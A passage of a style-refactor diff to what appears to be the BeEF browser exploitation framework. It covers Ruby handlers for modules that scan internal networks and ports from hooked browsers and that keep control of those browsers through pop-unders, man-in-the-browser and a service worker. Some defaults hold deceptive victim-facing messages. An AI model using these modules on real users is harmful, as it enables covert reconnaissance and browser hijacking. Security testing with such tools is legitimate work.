= BeEF::Core::Configuration.instance + return unless configuration.get('beef.extension.network.enable') == true + + session_id = @datastore['beefhook'] + + # @todo log the network service + # will need to once the datastore is confirmed. + # This should basically try and hook the browser + end +end diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb index 787b56336..165a80a71 100644 --- a/modules/network/get_http_servers/module.rb +++ b/modules/network/get_http_servers/module.rb @@ -5,40 +5,34 @@ # class Get_http_servers < BeEF::Core::Command - def self.options - return [ - {'name' => 'rhosts', 'ui_label' => 'Remote IP(s)', 'value' => 'common'}, - {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, - {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'}, - {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '5'}, - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'} + [ + { 'name' => 'rhosts', 'ui_label' => 'Remote IP(s)', 'value' => 'common' }, + { 'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080' }, + { 'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3' }, + { 'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '5' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10' } ] end - + def post_execute content = {} - content['url'] = @datastore['url'] if not @datastore['url'].nil? - if content.empty? - content['fail'] = 'No HTTP servers were discovered.' - end + content['url'] = @datastore['url'] unless @datastore['url'].nil? + content['fail'] = 'No HTTP servers were discovered.' if content.empty? save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&url=(.+)/ - proto = $1 - ip = $2 - port = $3 - url = $4 - session_id = @datastore['beefhook'] - if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server") - end - end + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=(\d+)&url=(.+)/ + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + url = Regexp.last_match(4) + session_id = @datastore['beefhook'] + if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: 'HTTP Server') end - end end diff --git a/modules/network/get_ntop_network_hosts/module.rb b/modules/network/get_ntop_network_hosts/module.rb index 5fbd19c1f..7221aae96 100644 --- a/modules/network/get_ntop_network_hosts/module.rb +++ b/modules/network/get_ntop_network_hosts/module.rb @@ -4,39 +4,35 @@ # See the file 'doc/COPYING' for copying permission # class Get_ntop_network_hosts < BeEF::Core::Command - def self.options - return [ + [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' }, { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '3000' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&data=(.+)\z/ - proto = $1 - ip = $2 - port = $3 - data = $4 - session_id = @datastore['beefhook'] - type = 'ntop' - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found 'ntop' [proto: #{proto}, ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) - end - data.to_s.scan(/"hostNumIpAddress":"([\d\.]+)"/).flatten.each do |ip| - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found host #{ip}") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip, :port => port) - end - end + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^proto=(https?)&ip=([\d.]+)&port=(\d+)&data=(.+)\z/ + + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + data = Regexp.last_match(4) + session_id = @datastore['beefhook'] + type = 'ntop' + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found 'ntop' [proto: #{proto}, ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: type) + end + data.to_s.scan(/"hostNumIpAddress":"([\d.]+)"/).flatten.each do |ip| + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip, port: port) end end end - end - diff --git a/modules/network/get_proxy_servers_wpad/module.rb b/modules/network/get_proxy_servers_wpad/module.rb index e6acf4b8b..e9c520294 100644 --- a/modules/network/get_proxy_servers_wpad/module.rb +++ b/modules/network/get_proxy_servers_wpad/module.rb @@ -4,30 +4,27 @@ # See the file 'doc/COPYING' for copying permission # class Get_proxy_servers_wpad < BeEF::Core::Command - def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) configuration = BeEF::Core::Configuration.instance - return unless configuration.get("beef.extension.network.enable") == true + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^proxies=(.+)$/ + session_id = @datastore['beefhook'] - if @datastore['results'] =~ /^proxies=(.+)$/ - proxies = $1.to_s - proxies.split(',').uniq.each do |proxy| - if proxy =~ /^(SOCKS|PROXY)\s+([\d\.]+:[\d]{1,5})/ - proxy_type = "#{$1}" - ip = $2.to_s.split(':')[0] - port = $2.to_s.split(':')[1] - proto = 'HTTP' if proxy_type =~ /PROXY/ - proto = 'SOCKS' if proxy_type =~ /SOCKS/ - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found #{proto} proxy [ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto.downcase, :ip => ip, :port => port, :type => "#{proto} Proxy") - end - end + proxies = Regexp.last_match(1).to_s + proxies.split(',').uniq.each do |proxy| + next unless proxy =~ /^(SOCKS|PROXY)\s+([\d.]+:\d{1,5})/ + + proxy_type = Regexp.last_match(1).to_s + ip = Regexp.last_match(2).to_s.split(':')[0] + port = Regexp.last_match(2).to_s.split(':')[1] + proto = 'HTTP' if proxy_type =~ /PROXY/ + proto = 'SOCKS' if proxy_type =~ /SOCKS/ + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found #{proto} proxy [ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto.downcase, ip: ip, port: port, type: "#{proto} Proxy") end end end - end - diff --git a/modules/network/identify_lan_subnets/module.rb b/modules/network/identify_lan_subnets/module.rb index 09d73f86e..beb46a549 100644 --- a/modules/network/identify_lan_subnets/module.rb +++ b/modules/network/identify_lan_subnets/module.rb @@ -8,21 +8,17 @@ ## class Identify_lan_subnets < BeEF::Core::Command - def self.options - return [ - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (ms)', 'value' => '500'} + [ + { 'name' => 'timeout', 'ui_label' => 'Timeout for each request (ms)', 'value' => '500' } ] end - + def post_execute content = {} - content['host'] = @datastore['host'] if not @datastore['host'].nil? - content['hosts'] = @datastore['hosts'] if not @datastore['hosts'].nil? - if content.empty? - content['fail'] = 'No active hosts have been discovered.' - end + content['host'] = @datastore['host'] unless @datastore['host'].nil? + content['hosts'] = @datastore['hosts'] unless @datastore['hosts'].nil? + content['fail'] = 'No active hosts have been discovered.' if content.empty? save content end - end diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb index a1a4ae4f4..e326b04a1 100644 --- a/modules/network/internal_network_fingerprinting/module.rb +++ b/modules/network/internal_network_fingerprinting/module.rb @@ -5,42 +5,35 @@ # class Internal_network_fingerprinting < BeEF::Core::Command - def self.options - return [ - {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, - {'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'}, - {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'}, - {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '5'}, - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'} + [ + { 'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254' }, + { 'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080' }, + { 'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3' }, + { 'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '5' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10' } ] end - + def post_execute content = {} - content['discovered'] = @datastore['discovered'] if not @datastore['discovered'].nil? - content['url'] = @datastore['url'] if not @datastore['url'].nil? - if content.empty? - content['fail'] = 'No devices/applications have been discovered.' - end + content['discovered'] = @datastore['discovered'] unless @datastore['discovered'].nil? + content['url'] = @datastore['url'] unless @datastore['url'].nil? + content['fail'] = 'No devices/applications have been discovered.' if content.empty? save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&discovered=(.+)&url=(.+)/ - proto = $1 - ip = $2 - port = $3 - discovered = $4 - url = $5 - session_id = @datastore['beefhook'] - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered) - end - end + return unless configuration.get('beef.extension.network.enable') == true && (@datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=(\d+)&discovered=(.+)&url=(.+)/) + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + discovered = Regexp.last_match(4) + url = Regexp.last_match(5) + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: discovered) end - end end diff --git a/modules/network/jslanscanner/module.rb b/modules/network/jslanscanner/module.rb index f8bd1832e..f03419a62 100644 --- a/modules/network/jslanscanner/module.rb +++ b/modules/network/jslanscanner/module.rb @@ -5,39 +5,37 @@ # class Fingerprint_routers < BeEF::Core::Command - def self.options - return [ - ] + [] end - + def post_execute content = {} - content['results'] = @datastore['results'] if not @datastore['results'].nil? + content['results'] = @datastore['results'] unless @datastore['results'].nil? save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&service=(.+)/ - proto = $1 - ip = $2 - port = $3 - service = $4 - session_id = @datastore['beefhook'] - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found network service " + service + " [proto: #{proto}, ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => service) - end - elsif @datastore['results'] =~ /^ip=(.+)&device=(.+)/ - ip = $1 - device = $2 - session_id = @datastore['beefhook'] - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found network device " + device + " [ip: #{ip}]") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip, :type => device) - end + return unless configuration.get('beef.extension.network.enable') == true + + case @datastore['results'] + when /^proto=(.+)&ip=(.+)&port=(\d+)&service=(.+)/ + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + service = Regexp.last_match(4) + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found network service #{service} [proto: #{proto}, ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: service) + end + when /^ip=(.+)&device=(.+)/ + ip = Regexp.last_match(1) + device = Regexp.last_match(2) + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found network device #{device} [ip: #{ip}]") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip, type: device) end end - end end diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb index eb9a0e69e..05665e3c3 100644 --- a/modules/network/nat_pinning_irc/module.rb +++ b/modules/network/nat_pinning_irc/module.rb @@ -4,30 +4,28 @@ # See the file 'doc/COPYING' for copying permission # class Irc_nat_pinning < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket("IRC", "0.0.0.0", 6667) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket('IRC', '0.0.0.0', 6667) end def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host - return [ - {'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host}, - {'name'=>'privateip', 'ui_label' =>'Private IP','value'=>'192.168.0.100'}, - {'name'=>'privateport', 'ui_label' =>'Private Port','value'=>'22'} + [ + { 'name' => 'connectto', 'ui_label' => 'Connect to', 'value' => beef_host }, + { 'name' => 'privateip', 'ui_label' => 'Private IP', 'value' => '192.168.0.100' }, + { 'name' => 'privateport', 'ui_label' => 'Private Port', 'value' => '22' } ] end - + def post_execute return if @datastore['result'].nil? - save({'result' => @datastore['result']}) + + save({ 'result' => @datastore['result'] }) # wait 30 seconds before unbinding the socket. The HTTP connection will arrive sooner than that anyway. sleep 30 - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket("IRC") - + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket('IRC') end - end diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb index 30fcbc8cc..1b0a93ab6 100644 --- a/modules/network/ping_sweep/module.rb +++ b/modules/network/ping_sweep/module.rb @@ -4,35 +4,30 @@ # See the file 'doc/COPYING' for copying permission # class Ping_sweep < BeEF::Core::Command - def post_execute content = {} content['result'] = @datastore['result'] save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true + return unless configuration.get('beef.extension.network.enable') == true - session_id = @datastore['beefhook'] + # log the network service + return unless @datastore['results'] =~ /^ip=(.+)&ping=(\d+)ms$/ - # log the network service - if @datastore['results'] =~ /^ip=(.+)&ping=(\d+)ms$/ - ip = $1 - ping = $2 - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found host #{ip}") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip) - end - end + ip = Regexp.last_match(1) + # ping = Regexp.last_match(2) + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip) end - end def self.options - return [ - {'name' => 'rhosts', 'ui_label' => 'Scan IP range (C class)', 'value' => 'common' }, - {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'} + [ + { 'name' => 'rhosts', 'ui_label' => 'Scan IP range (C class)', 'value' => 'common' }, + { 'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3' } ] end - end diff --git a/modules/network/ping_sweep_ff/module.rb b/modules/network/ping_sweep_ff/module.rb index 75b349086..310d5437d 100644 --- a/modules/network/ping_sweep_ff/module.rb +++ b/modules/network/ping_sweep_ff/module.rb @@ -8,39 +8,31 @@ # Discover active hosts in the internal network of the hooked browser. # It works calling a Java method from JavaScript and do not require user interaction. - class Ping_sweep_ff < BeEF::Core::Command - def self.options - return [ - {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'}, - {'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '2000'}, - {'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '100'} + [ + { 'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '2000' }, + { 'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '100' } ] end - + def post_execute content = {} - content['host'] =@datastore['host'] if not @datastore['host'].nil? - if content.empty? - content['fail'] = 'No active hosts have been discovered.' - end + content['host'] = @datastore['host'] unless @datastore['host'].nil? + content['fail'] = 'No active hosts have been discovered.' if content.empty? save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /host=([\d.]+) is alive/ - session_id = @datastore['beefhook'] - - # save the network host - if @datastore['results'] =~ /host=([\d\.]+) is alive/ - ip = $1 - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser has network interface #{ip}") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip) - end - end + # save the network host + ip = Regexp.last_match(1) + session_id = @datastore['beefhook'] + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser has network interface #{ip}") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip) end - end end diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb index 6719abe44..de78872b8 100644 --- a/modules/network/ping_sweep_java/module.rb +++ b/modules/network/ping_sweep_java/module.rb @@ -8,26 +8,22 @@ # Discover active hosts in the internal network of the hooked browser. # It works calling a Java method from JavaScript and do not require user interaction. - class Ping_sweep_java < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/ping_sweep_java/pingSweep.class','/pingSweep','class') - end + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/ping_sweep_java/pingSweep.class', '/pingSweep', 'class') + end def self.options - return [ - {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'}, - {'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '2000'} + [ + { 'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '2000' } ] end - + def post_execute content = {} - content['ps'] =@datastore['ps'] if not @datastore['ps'].nil? - if content.empty? - content['fail'] = 'No active hosts have been discovered.' - end + content['ps'] = @datastore['ps'] unless @datastore['ps'].nil? + content['fail'] = 'No active hosts have been discovered.' if content.empty? BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/pingSweep.class') save content end diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb index 59d1dbed9..dabc7e0e9 100644 --- a/modules/network/port_scanner/module.rb +++ b/modules/network/port_scanner/module.rb @@ -5,46 +5,39 @@ # # # Port Scanner Module - javier.marcos -# Scan ports in a given hostname, using WebSockets CORS and HTTP with img tags. +# Scan ports in a given hostname, using WebSockets CORS and HTTP with img tags. # It uses the three methods to avoid blocked ports or Same Origin Policy. - class Port_scanner < BeEF::Core::Command - def self.options - return [ - {'name' => 'ipHost', 'ui_label' => 'Scan IP or Hostname', 'value' => '192.168.1.10'}, - {'name' => 'ports' , 'ui_label' => 'Specific port(s) to scan', 'value' => 'top'}, - {'name' => 'closetimeout' , 'ui_label' => 'Closed port timeout (ms)', 'value' => '1100'}, - {'name' => 'opentimeout', 'ui_label' => 'Open port timeout (ms)', 'value' => '2500'}, - {'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '600'}, - {'name' => 'debug', 'ui_label' => 'Debug', 'value' => 'false'} + [ + { 'name' => 'ipHost', 'ui_label' => 'Scan IP or Hostname', 'value' => '192.168.1.10' }, + { 'name' => 'ports', 'ui_label' => 'Specific port(s) to scan', 'value' => 'top' }, + { 'name' => 'closetimeout', 'ui_label' => 'Closed port timeout (ms)', 'value' => '1100' }, + { 'name' => 'opentimeout', 'ui_label' => 'Open port timeout (ms)', 'value' => '2500' }, + { 'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '600' }, + { 'name' => 'debug', 'ui_label' => 'Debug', 'value' => 'false' } ] end - + def post_execute content = {} - content['port'] =@datastore['port'] if not @datastore['port'].nil? - if content.empty? - content['fail'] = 'No open ports have been found.' - end + content['port'] = @datastore['port'] unless @datastore['port'].nil? + content['fail'] = 'No open ports have been found.' if content.empty? save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^ip=([\d\.]+)&port=(CORS|WebSocket|HTTP): Port ([\d]+) is OPEN (.*)$/ - ip = $1 - port = $3 - service = $4 - session_id = @datastore['beefhook'] - proto = 'http' - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :ntype => service) - end - end + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^ip=([\d.]+)&port=(CORS|WebSocket|HTTP): Port (\d+) is OPEN (.*)$/ + ip = Regexp.last_match(1) + port = Regexp.last_match(3) + service = Regexp.last_match(4) + session_id = @datastore['beefhook'] + proto = 'http' + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, ntype: service) end - end end diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb index 30da6655b..e587058ea 100644 --- a/modules/persistence/confirm_close_tab/module.rb +++ b/modules/persistence/confirm_close_tab/module.rb @@ -4,25 +4,22 @@ # See the file 'doc/COPYING' for copying permission # class Confirm_close_tab < BeEF::Core::Command + def self.options + [{ + 'name' => 'text', + 'description' => 'Specifies message to display to the user.', + 'type' => 'textarea', + 'ui_label' => 'Confirm text', + 'value' => 'Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.', + 'width' => '400px' + }, + { 'name' => 'usePopUnder', + 'type' => 'checkbox', + 'ui_label' => 'Create a pop-under window on user\'s tab closing', + 'checked' => 'true' }] + end - def self.options - return [{ - 'name' => 'text', - 'description' => 'Specifies message to display to the user.', - 'type' => 'textarea', - 'ui_label' => 'Confirm text', - 'value' => 'Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.', - 'width' => '400px' - }, - { 'name' => 'usePopUnder', - 'type' => 'checkbox', - 'ui_label' => 'Create a pop-under window on user\'s tab closing', - 'checked' => 'true' - }] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/persistence/hijack_opener/module.rb b/modules/persistence/hijack_opener/module.rb index e05d201bf..e23ca41bd 100644 --- a/modules/persistence/hijack_opener/module.rb +++ b/modules/persistence/hijack_opener/module.rb @@ -18,13 +18,14 @@ class Hijack_opener < BeEF::Core::Command src << '}' BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw( '200', - {'Content-Type' => 'text/html'}, + { 'Content-Type' => 'text/html' }, src, '/iframe', - -1) + -1 + ) end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb index 789278594..190cbd4ef 100644 --- a/modules/persistence/iframe_above/module.rb +++ b/modules/persistence/iframe_above/module.rb @@ -4,12 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Iframe_above < BeEF::Core::Command - - # This method is being called when a hooked browser sends some - # data back to the framework. - # - def post_execute - save({'result' => @datastore['result']}) - end - + # This method is being called when a hooked browser sends some + # data back to the framework. + # + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/persistence/invisible_htmlfile_activex/module.rb b/modules/persistence/invisible_htmlfile_activex/module.rb index 1f0006449..20262d9ec 100644 --- a/modules/persistence/invisible_htmlfile_activex/module.rb +++ b/modules/persistence/invisible_htmlfile_activex/module.rb @@ -5,6 +5,6 @@ # class Invisible_htmlfile_activex < BeEF::Core::Command def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/persistence/jsonp_service_worker/module.rb b/modules/persistence/jsonp_service_worker/module.rb index cba8c137c..3979bf715 100644 --- a/modules/persistence/jsonp_service_worker/module.rb +++ b/modules/persistence/jsonp_service_worker/module.rb @@ -1,14 +1,13 @@ class Jsonp_service_worker < BeEF::Core::Command - def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end def self.options - return [ - {'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback='}, - {'name' => 'tempBody', 'ui_label' => 'Temporary HTML body to show to the users', 'value' => '

Unplanned site maintenance, please wait a few seconds, we are almost done.

'} + [ + { 'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback=' }, + { 'name' => 'tempBody', 'ui_label' => 'Temporary HTML body to show to the users', + 'value' => '

Unplanned site maintenance, please wait a few seconds, we are almost done.

' } ] end - end diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb index 4e483063b..790800d2b 100644 --- a/modules/persistence/man_in_the_browser/module.rb +++ b/modules/persistence/man_in_the_browser/module.rb @@ -5,9 +5,7 @@ # class Man_in_the_browser < BeEF::Core::Command - def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb index ed5e7fff2..e155b7088 100644 --- a/modules/persistence/popunder_window/module.rb +++ b/modules/persistence/popunder_window/module.rb @@ -10,7 +10,8 @@ class Popunder_window < BeEF::Core::Command 'type' => 'checkbox', 'checked' => false }] end + def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/persistence/popunder_window_ie/module.rb b/modules/persistence/popunder_window_ie/module.rb index cc08aea84..493d371a2 100644 --- a/modules/persistence/popunder_window_ie/module.rb +++ b/modules/persistence/popunder_window_ie/module.rb @@ -5,6 +5,6 @@ # class Popunder_window_ie < BeEF::Core::Command def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/phonegap/phonegap_alert_user/module.rb b/modules/phonegap/phonegap_alert_user/module.rb index c2fa86279..742d326dd 100644 --- a/modules/phonegap/phonegap_alert_user/module.rb +++ b/modules/phonegap/phonegap_alert_user/module.rb @@ -7,33 +7,31 @@ # class Phonegap_alert_user < BeEF::Core::Command - - def self.options - return [{ - 'name' => 'title', - 'description' => 'Alert title', - 'ui_label'=>'Title', - 'value' => 'Beef', - 'width' => '300px' - },{ - 'name' => 'message', - 'description' => 'Message', - 'ui_label'=>'Message', - 'value' => 'Game over!', - 'width' => '300px' - },{ - 'name' => 'buttonName', - 'description' => 'Default button name', - 'ui_label'=>'Button name', - 'value' => 'Done', - 'width' => '100px' - }] + def self.options + [{ + 'name' => 'title', + 'description' => 'Alert title', + 'ui_label' => 'Title', + 'value' => 'Beef', + 'width' => '300px' + }, { + 'name' => 'message', + 'description' => 'Message', + 'ui_label' => 'Message', + 'value' => 'Game over!', + 'width' => '300px' + }, { + 'name' => 'buttonName', + 'description' => 'Default button name', + 'ui_label' => 'Button name', + 'value' => 'Done', + 'width' => '100px' + }] end def callback content = {} content['Result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb index 7d451b329..0044b16e4 100644 --- a/modules/phonegap/phonegap_beep/module.rb +++ b/modules/phonegap/phonegap_beep/module.rb @@ -7,11 +7,9 @@ # class Phonegap_beep < BeEF::Core::Command - - def post_execute + def post_execute content = {} content['result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb index cbeef6983..14079e992 100644 --- a/modules/phonegap/phonegap_check_connection/module.rb +++ b/modules/phonegap/phonegap_check_connection/module.rb @@ -7,11 +7,9 @@ # class Phonegap_check_connection < BeEF::Core::Command - - def post_execute + def post_execute content = {} content['result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb index 607c62a8a..ab8511d89 100644 --- a/modules/phonegap/phonegap_detect/module.rb +++ b/modules/phonegap/phonegap_detect/module.rb @@ -7,11 +7,9 @@ # class Phonegap_detect < BeEF::Core::Command - def post_execute content = {} content['phonegap'] = @datastore['phonegap'] save content end - end diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb index f949a5b92..76254f571 100644 --- a/modules/phonegap/phonegap_file_upload/module.rb +++ b/modules/phonegap/phonegap_file_upload/module.rb @@ -7,27 